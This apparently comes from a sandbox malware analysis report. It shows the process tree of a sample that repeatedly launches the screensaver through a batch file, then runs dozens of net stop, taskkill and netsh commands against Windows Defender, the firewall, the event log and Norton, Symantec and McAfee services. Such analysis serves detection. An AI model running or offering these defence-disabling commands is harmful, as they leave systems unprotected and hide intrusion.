C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5080
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2468
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3152
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3808
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4980
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3688
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3184
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2344
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3476
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3088
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1132
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4156
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2056
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3312
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1544
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3204
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4764
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3392
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4336
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1460
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:112
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2416
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2464
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4432
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5036
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1576
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3180
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2140
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3028
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3116
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1616
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3220
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1868
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4256
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2828
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3196
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2896
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3172
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4736
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2280
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3936
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1724
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1964
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3148
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2732
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2960
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1132
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4932
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1668
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3428
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3768
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1420
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2564
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2332
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1352
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4432
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:428
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3024
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1916
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4140
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3084
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2340
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4352
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3404
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3124
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2700
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3768
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2980
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1388
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4548
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2572
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4464
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3612
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3996
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2572
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3980
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3996
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2828
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1912
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3344
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3684
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4736
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2776
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2928
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1472
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4188
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3496
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4312
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:796
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1780
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2008
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4336
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2416
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2476
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5032
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2140
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2832
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1868
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3704
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2188
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4576
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4188
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1328
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3124
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2844
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1496
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3788
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1932
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2780
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:784
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2140
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3116
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3220
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4968
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3324
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1888
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1416
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1724
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4420
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2732
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:796
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:864
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3428
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3768
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4712
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4360
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5088
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2736
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2244
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5108
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:676
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2292
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2320
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1368
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4520
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:888
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4592
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1776
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3192
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3808
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1176
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4980
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:444
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3688
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1456
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4660
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2928
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2000
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4200
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4352
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3476
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1488
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4868
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2068
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1744
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2200
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1480
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4060
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1004
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4804
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1032
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4672
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3168
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4784
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1072
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3976
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3324
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1824
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4200
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3148
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2068
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4156
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4060
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4772
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1496
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2540
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1368
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2468
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4784
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1176
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4328
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3004
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:4900
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵PID:2832
-
-
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵PID:4980
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵PID:1868
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵PID:4056
-
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵PID:4116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵PID:1964
-
-
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵PID:3668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵PID:4932
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:5012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:4112
-
-
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵PID:4652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵PID:2652
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵PID:4756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵PID:4492
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵PID:3676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵PID:2348
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:4260
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵PID:3544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵PID:1032
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵PID:2464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵PID:1904
-
-
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵PID:756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵PID:1368
-
-
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵PID:784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵PID:228
-
-
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵PID:1116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵PID:5036
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:1636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:2020
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:3116
-
-
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵PID:4980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵PID:1616
-
-
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵PID:3688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵PID:2672
-
-
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵PID:4256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵PID:1912
-
-
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵PID:3344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵PID:3184
-
-
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵PID:4736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵PID:1888
-
-
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵PID:2340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵PID:2256
-
-
-
C:\Windows\system32\net.exenet stop srservice /y2⤵PID:4324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵PID:1384
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵PID:2964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵PID:1316
-
-
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵PID:3404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵PID:3088
-
-
-
C:\Windows\system32\net.exenet stop MskService /y2⤵PID:5000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵PID:796
-
-
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵PID:128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵PID:1468
-
-
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵PID:4356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵PID:4056
-
-
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵PID:2652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵PID:1004
-
-
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵PID:4880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵PID:4804
-
-
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵PID:3392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵PID:3676
-
-
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵PID:4260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵PID:1460
-
-
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵PID:3364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵PID:3584
-
-
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵PID:1904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵PID:4088
-
-
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵PID:2136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵PID:1224
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:4632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:5032
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:1116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:3036
-
-
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵PID:3028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵PID:3612
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:1616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:1176
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:5004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:1868
-
-
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵PID:3596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵PID:3620
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵PID:656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵PID:3084
-
-
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵PID:2280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵PID:4644
-
-
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵PID:3936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵PID:4200
-
-
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵PID:3148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵PID:4476
-
-
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵PID:2960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵PID:4868
-
-
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵PID:2396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵PID:3668
-
-
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵PID:4424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵PID:4492
-
-
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵PID:3608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵PID:3396
-
-
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵PID:1388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵PID:4132
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:2588
-
